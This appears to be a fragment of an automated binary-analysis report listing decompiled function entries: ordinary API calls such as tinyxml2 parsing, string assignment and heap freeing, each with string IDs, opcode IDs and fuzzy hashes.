                • Instruction Fuzzy Hash: C6E09231240228BBCB222F51DC09EDE7F26EF50B60F008020F918651A1CB729925A7A4
                APIs
                • ?ParseText@StrPair@tinyxml2@@QAEPADPADPBDHPAH@Z.RWSNDPQSKZ(?,-->,00000002,?), ref: 00CB0C57
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000A,?,00000000), ref: 00CB0C6B
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                Similarity
                • API ID: Pair@tinyxml2@@$Document@tinyxml2@@Error@Error@2@ParseReset@Str@Text@
                • String ID: -->
                • API String ID: 3198950141-782191589
                • Opcode ID: ba6a64d288945bc2545e23e60b6ea3c6aadd8b41af895e73a743dbf11f75ab39
                • Instruction ID: dfa2e1bb858cdd319cb1979668994ca23a305d7f3e954ad4e3b881b833fe0898
                • Opcode Fuzzy Hash: ba6a64d288945bc2545e23e60b6ea3c6aadd8b41af895e73a743dbf11f75ab39
                • Instruction Fuzzy Hash: 15E026363007057FCB212E45DC02ED77F29EBA0760F004429F91966162DA62DC25A3A0
                APIs
                Similarity
                • API ID: H_prolog3
                • String ID: im_receive_handler$undefined_msg_handler
                • API String ID: 431132790-1997704712
                • Opcode ID: d69c993cf3e2bad922f1046aef553d33f8d34a3e51f4d0d05f6d35b833366c22
                • Instruction ID: 592df0eceb09ace05e0e405090c5cd8348e7572c6172bf9479bcfe846d1becce
                • Opcode Fuzzy Hash: d69c993cf3e2bad922f1046aef553d33f8d34a3e51f4d0d05f6d35b833366c22
                • Instruction Fuzzy Hash: 17E039B06003419FCB60DF798801399BBF1BB04708F10492DE494EB381CBF15688EB65
                APIs
                Similarity
                • API ID: H_prolog3
                • String ID: send_message$undefined_msg
                • API String ID: 431132790-4080192209
                • Opcode ID: a92185e0ff92b4b2ef13b912b6acd6116c19df35809120f6e38c28d37dceb88c
                • Instruction ID: 075849256da94e04f11049ecab319b728861f28a39081244a9aec3ae41b93a79
                • Opcode Fuzzy Hash: a92185e0ff92b4b2ef13b912b6acd6116c19df35809120f6e38c28d37dceb88c
                • Instruction Fuzzy Hash: E9E039B06003519FCB60DF788801399BAF0BB04708F10496DA498EB281CBB59688EB51
                APIs
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(true), ref: 00C64628
                Similarity
                • API ID: Assign@?$Cmm@@String
                • String ID: false$true
                • API String ID: 667192774-2658103896
                • Opcode ID: 0a56adad2f686c611a0d457e1fd8559c1ae5756cb2ac45723dda339855744e85
                • Instruction ID: dc7ce5922e63a311859095faea997034c87d98a2d14c7f5397e90914bc42e833
                • Opcode Fuzzy Hash: 0a56adad2f686c611a0d457e1fd8559c1ae5756cb2ac45723dda339855744e85
                • Instruction Fuzzy Hash: 89C08C35200A0C63DF045994A465729339C8B80308FC0842CFA0C8B381C930ED8097E8
                APIs
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(true), ref: 00C64648
                Similarity
                • API ID: Assign@?$Cmm@@String
                • String ID: false$true
                • API String ID: 667192774-2658103896
                • Opcode ID: 2c7169d6312e626c3f6fbd80b1c6ba7f097db2ed502f450f1c0cecebc7af5ec9
                • Instruction ID: 0b0cc3b0415d216a03fdab24c1b61ece123082bda9d2489f6f20ce18fd7ef87c
                • Opcode Fuzzy Hash: 2c7169d6312e626c3f6fbd80b1c6ba7f097db2ed502f450f1c0cecebc7af5ec9
                • Instruction Fuzzy Hash: C5C08C30200A0C97CF0859D8E892B2A33DD9B80300F80842CBE0C8F745C9B2DD8887E8
                APIs
                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CD4F93), ref: 00CD4A00
                • HeapFree.KERNEL32(00000000), ref: 00CD4A07
                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CD4F93), ref: 00CD4A20
                • HeapFree.KERNEL32(00000000), ref: 00CD4A27
                Similarity
                • API ID: Heap$FreeProcess
                • String ID:
                • API String ID: 3859560861-0
                • Opcode ID: e0ff0c36da886d4d32acbc636506a26ec4b8bb4ee6168aa68d8cd1b21552d6e9
                • Instruction ID: 68c1e4715af2abeff2ae5102a3fbd97849c64f9e1d6e8b413b2006b6394f0f8c
                • Opcode Fuzzy Hash: e0ff0c36da886d4d32acbc636506a26ec4b8bb4ee6168aa68d8cd1b21552d6e9
                • Instruction Fuzzy Hash: 2EF03A39A00360EBD7289F50EC48BA63769BB48742F54C109AA01D7368CF34D843DBB4